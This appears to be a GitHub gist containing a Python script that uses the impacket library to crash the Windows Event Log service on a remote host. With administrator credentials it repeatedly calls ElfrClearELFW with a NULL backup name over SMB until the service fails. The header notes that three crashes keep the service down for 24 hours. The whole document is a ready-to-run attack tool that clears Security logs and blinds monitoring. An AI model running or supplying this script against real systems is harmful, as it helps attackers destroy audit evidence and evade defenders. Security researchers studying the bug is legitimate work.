|
|
@@ -0,0 +1,49 @@ |
|
|
# Crash the Windows Event Log Service remotely, needs Admin privs |
|
|
# originally discovered by limbenjamin and accidently re-discovered by @byt3bl33d3r |
|
|
# |
|
|
# Once the service crashes 3 times it will not restart for 24 hours |
|
|
# |
|
|
# https://github.com/limbenjamin/LogServiceCrash |
|
|
# https://limbenjamin.com/articles/crash-windows-event-logging-service.html |
|
|
# |
|
|
# Needs the impacket library (https://github.com/SecureAuthCorp/impacket) |
|
|
|
|
|
from impacket.dcerpc.v5 import transport, even |
|
|
from impacket.smbconnection import SMBConnection, SessionError |
|
|
from impacket.smb import SMB_DIALECT |
|
|
from impacket.dcerpc.v5.dtypes import NULL |
|
|
|
|
|
host = "target_ip" |
|
|
username = "Administrator" |
|
|
password = "password" |
|
|
|
|
|
while True: |
|
|
# We're using an SMBv1 connection so you can see the un-encrypted traffic if you so desire |
|
|
conn = SMBConnection(host, host, None, 445, preferredDialect=SMB_DIALECT) |
|
|
conn.login(username, password) |
|
|
|
|
|
rpctransport = transport.SMBTransport(host, host, filename='/eventlog', smb_connection=conn) |
|
|
|
|
|
try: |
|
|
dce = rpctransport.get_dce_rpc() |
|
|
dce.connect() |
|
|
dce.bind(even.MSRPC_UUID_EVEN, transfer_syntax = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0')) |
|
|
except SessionError: |
|
|
print("Event log go boom!") |
|
|
break |
|
|
|
|
|
try: |
|
|
|
|
|
resp = even.hElfrOpenELW(dce, 'Security', '') |
|
|
resp.dump() |
|
|
|
|
|
# Calling ElfrClearELFW with a handle from ElfrOpenELW and specifying NULL as the BackupFileName seems to be what triggers the bug |
|
|
resp = even.hElfrClearELFW( |
|
|
dce, |
|
|
resp['LogHandle'], |
|
|
NULL |
|
|
) |
|
|
|
|
|
resp.dump() |
|
|
except SessionError: |
|
|
pass |
byt3bl33d3r created this gist